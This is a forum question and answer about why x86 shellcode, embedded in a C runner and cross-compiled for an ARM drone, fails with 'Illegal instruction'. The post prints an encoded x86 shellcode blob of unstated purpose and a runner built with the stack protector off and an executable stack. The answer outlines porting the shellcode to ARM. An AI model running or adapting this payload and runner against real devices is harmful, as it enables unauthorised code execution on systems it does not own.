cross compiling shellcode to arm

Question

I am working on a project where I need to execute some shellcode on a drone running linux on a 32 bit arm processor. I can communicate with the drone via telnet with the standard busybox shell, so I can't execute many complex commands, so no compiling on the drone itself. I am able to transfer and execute a helloworld program I cross compiled with "arm-linux-gnueabi-gcc". Now here's the problem: when I try to do exactly the same thing with my x86 shellcode c program, I get the error Illegal instruction after running it on the drone.

My c program looks as follows:

#include <string.h>
#include <stdio.h>

unsigned char code[] = 
"\xbe\xc6\xfe\xae\xa9\xd9\xea\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x1f\x83\xc3\x04\x31\x73\x11\x03\x73\x11\xe2\x33\x94\xa4\xf7"
"\x8a\xb2\x4e\xe4\xbf\x07\xe2\x81\x3d\x38\x62\xdf\xa0\xf5\xeb"
"\x48\x79\x6e\x2c\xde\xbd\x5d\xc4\x1d\x3d\xb3\x48\xab\xdc\xd9"
"\x16\xf3\x4e\x4f\x80\x8a\x8f\x2c\xe3\x0d\xca\x73\x82\x14\x9a"
"\x07\x48\x4f\x80\xe8\xb2\x8f\x9c\x82\xb2\xe5\x19\xda\x50\xc8"
"\xe8\x11\x16\xae\x2a\xd0\xaa\x5a\x8d\x91\xd2\x25\xd1\xc5\xdc"
"\x55\x58\x06\x1d\xbe\x56\x08\x7d\x4d\xd6\xf7\x4f\xce\x93\xc8"
"\x28\xdf\xc0\x41\x29\x46\x40\x5d\x1a\x7a\x61\xde\xdf\xbd\x01"
"\xdd\x20\xdc\x49\xe0\xde\x1f\xa9\x58\xdf\x1f\xa9\x9e\x2d\x9f";


int main(int argc, char **argv) {
  int foo_value = 0;

  int (*foo)() = (int(*)())code;
  foo_value = foo();

  printf("%d\n", foo_value);
}

I have compiled this code with the command: arm-linux-gnueabi-gcc -fno-stack-protector -z execstack cprogram.c -o output.elf . And the "file" command outputs:

output.elf: ELF 32-bit LSB pie executable ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=43757152cbcf40dcc6a75cf210c156332557b575, not stripped

Which looks normal to me. This exact same code runs fine on my 64 bit linux machine when compiled as a 32 bit executable. I have removed the x00 instructions from the shellcode, I am not sure if there are more bad characters which need to be removed. So my question is: what causes this error and what would be a way to be able to execute this code correctly on the arm processor. Thanks!

Answer 1

unsigned char code[] = "\\xbe\\xc6\\xfe\\xae\\xa9\\xd9\\xea\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1"

That code is x86 machine instructions.

Of course they wouldn't run on an ARM processor, what else did you expect?

You must find the source of that shell code (usually a tiny .asm file), translate that .asm from x86 to ARM assembly, and compile it to ARM .o file, and finally use objdump -d to get equivalent machine code for ARM.

Now put that machine code into the code array, rebuild the ARM executable, and enjoy.

PS You can likely find equivalent shell code for ARM, saving you some of the steps above.